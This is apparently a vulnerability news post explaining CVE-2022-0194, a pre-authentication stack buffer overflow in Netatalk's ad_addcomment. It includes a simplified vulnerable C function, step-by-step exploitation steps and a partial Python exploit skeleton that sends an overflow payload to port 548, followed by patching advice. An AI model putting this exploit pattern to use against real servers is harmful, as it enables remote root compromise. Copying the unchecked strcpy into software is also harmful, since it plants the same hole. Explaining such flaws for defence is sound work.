CVE CyberSecurity Database News

CVE-2022-0194 - How a Simple Buffer Overflow in Netatalk's ad_addcomment Can Lead to Remote Root Code Execution

Poster -

_CVE-2022-0194_ is a security vulnerability that affects Netatalk, a popular open-source implementation of the Apple Filing Protocol. This bug is severe because it lets a remote attacker execute code as root on a vulnerable server—no login or authentication required. In this post, we’ll break down how this bug works, what makes it dangerous, and how an attacker can exploit it, all in plain English.

What is Netatalk and Why Does This Matter?

Netatalk is used by many organizations as a file-sharing solution for Mac clients. It runs with elevated privileges to handle sensitive files, making any serious vulnerability in it a juicy target for attackers.

The Vulnerability: CVE-2022-0194

Disclosed by Zero Day Initiative as ZDI-CAN-15876, this vulnerability is all about a buffer overflow caused by a lack of length validation in the ad_addcomment function.

Where’s the Problem?

Inside the function ad_addcomment, user-supplied data is copied into a fixed-size buffer on the stack without checking if the input actually fits—a classic stack buffer overflow.

Here’s an example of (slightly simplified) vulnerable code based on the advisories

void ad_addcomment(char *comment) {
    char buffer[256];
    // DOES NOT CHECK LENGTH!
    strcpy(buffer, comment);
    // ... other code follows
}

If the comment argument is longer than 256 bytes, the data spills over the buffer, corrupting the stack. By crafting this data carefully, an attacker can overwrite the return address or other control data, letting them run any code they want as root.

No Authentication Barrier

The scary part? There’s no login, handshake, or authentication required. The vulnerable code runs as soon as a network request arrives, before checking who sent it.

Here’s a step-by-step breakdown of one way an attacker could exploit this bug

1. Identify Vulnerable Servers: Scan the network for exposed Netatalk services (usually port 548/tcp).
2. Send Malicious Data: Craft a request that triggers ad_addcomment, with a string that’s, say, 400 bytes long. The string is shaped so that the extra bytes after 256 overwrite the saved return address with a pointer to attacker-controlled shellcode.
3. Execute Code as Root: When ad_addcomment finishes and tries to return, it jumps to the shellcode instead of going back to harmless program code.

For example

import socket

target_ip = "TARGET_IP"
payload = b"A" * 256                 # Fills up the buffer
payload += b"\xef\xbe\xad\xde"       # Overwrites saved EBP
payload += b"\x12\x34\x56\x78"       # Overwrites saved RET address (place shellcode address here)
payload += b"\x90" * 32              # NOP sled
payload += b"\xcc" * 100             # Insert your shellcode here

# The details of sending the payload will depend on the precise protocol Netatalk uses for ad_addcomment
s = socket.create_connection((target_ip, 548))
# Send appropriate headers and our payload as the 'comment'
s.sendall(payload)
s.close()

See this reference exploit by ZDI for more specifics, since network protocol details are required to construct an actual working exploit.

Original References & Further Reading

- Official CVE Details: CVE-2022-0194
- ZDI Advisory ZDI-22-333
- Netatalk Project Page
- Netatalk Patch Announcement

Update Netatalk to the latest patched version.

2. Or, if you can't update, disable the service or firewall port 548/tcp to prevent access.

TL;DR

CVE-2022-0194 is a buffer overflow bug in Netatalk’s ad_addcomment function. It’s easy to exploit, requires no login, and hands attackers full root control. Make sure your systems are patched now.

Timeline

Published on: 03/28/2023 19:15:00 UTC
Last modified on: 04/03/2023 18:16:00 UTC